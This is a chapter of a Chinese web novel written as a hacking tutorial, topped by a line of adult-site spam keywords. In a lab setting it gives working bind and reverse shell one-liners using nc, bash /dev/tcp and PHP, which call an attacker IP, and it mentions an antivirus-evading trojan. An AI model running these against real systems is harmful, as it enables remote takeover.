亚洲欧美综合精品二区,亚洲av无码国产精品夜色午夜,亚洲精品无码乱码成人,亚洲精品成人久久久,亚洲av成人午夜电影在线观看

話(huà)本小說(shuō)網(wǎng) > 都市小說(shuō) > 少年,你想學(xué)黑客嗎?想學(xué)?我教你??!
本書(shū)標(biāo)簽: 都市  黑客知識(shí) 

反彈shell,以退為進(jìn)

少年,你想學(xué)黑客嗎?想學(xué)?我教你??!

雖然我教給了大家木馬的制作,但出于某些原因,我們的計(jì)算機(jī)向?qū)Ψ桨l(fā)出的指令不能被執(zhí)行

這個(gè)時(shí)候,之前所做的一切就都失去了價(jià)值

而為了避免做了無(wú)用功,一些黑客就想了一個(gè)辦法:讓別人來(lái)連接我們。

shell也就應(yīng)運(yùn)而生了

而shell又分為兩種:正向和反向

正向,就是新篁弄小L(我一個(gè)發(fā)?。?/p>

我去她家,讓她的電腦發(fā)一些東西,使她成為服務(wù)端

我再遠(yuǎn)程連接(訪(fǎng)問(wèn)她的電腦)她電腦的數(shù)據(jù)就泄露了

反向,就是新篁跑小L家

下載了一個(gè).exe文件,結(jié)果那是個(gè)加過(guò)殼的木馬,3XX沒(méi)檢測(cè)出來(lái)

于是新篁的電腦就被小L控制了

以下是實(shí)戰(zhàn)(我一般玩木馬,對(duì)潛入別人家里下載東西沒(méi)興趣)

在kali rolling(服務(wù)端)上監(jiān)聽(tīng)23333端口,并反彈shell

nc -lvp 23333 -e /bin/sh

第二步:在ubuntu18(客戶(hù)端)上連接kali rolling的23333端口

這個(gè)時(shí)候,客戶(hù)端就拿到服務(wù)端的shell控制權(quán)了

可以隨意控制服務(wù)端

nc 192.168.160.140 23333

反向shell(客戶(hù)端送shell)

1.ubuntu18上選擇增強(qiáng)版的netcat

一般ubuntu默認(rèn)的是free-bsd版本的nc

update-alternatives --config nc

2.在kali rolling上啟動(dòng)服務(wù)端,等待客戶(hù)端上鉤

客戶(hù)端只要吃鉤子,服務(wù)端就獲得了客戶(hù)端的shell控制權(quán)

可以隨意控制客戶(hù)端

nc -lvp 23333

3.在ubuntu18上啟動(dòng)客戶(hù)端,吃鉤子

nc 192.168.160.140 23333 -e /bin/sh

注:Ubuntu是一個(gè)系統(tǒng),適用于Linux

Ubuntu我之前在VM里運(yùn)行過(guò),界面太小了

bash反彈shell

服務(wù)端(kali rolling上監(jiān)聽(tīng)23333)

客戶(hù)端吃鉤子,服務(wù)端就成功控制客戶(hù)端了

nc -lvp 23333

客戶(hù)端(ubuntu18上bash反彈shell)

bash -i >& /dev/tcp/192.168.160.140/23333 0>&1

php反彈shell

服務(wù)端(kali rolling上監(jiān)聽(tīng)23333)

客戶(hù)端吃鉤子,服務(wù)端就成功控制客戶(hù)端了

客戶(hù)端(ubuntu18上bash反彈shell)

php -r '$f=fsockopen("192.168.160.140",23333);exec("/bin/sh -i <&3 >&3 2>&3");'

反彈shell在安全攻防里算一種主流了

還是有必要記一下的

上一章 docker的安裝及使用 少年,你想學(xué)黑客嗎?想學(xué)?我教你??!最新章節(jié) 下一章 WAF--攻擊網(wǎng)站遇到的最難的挑戰(zhàn)之一
?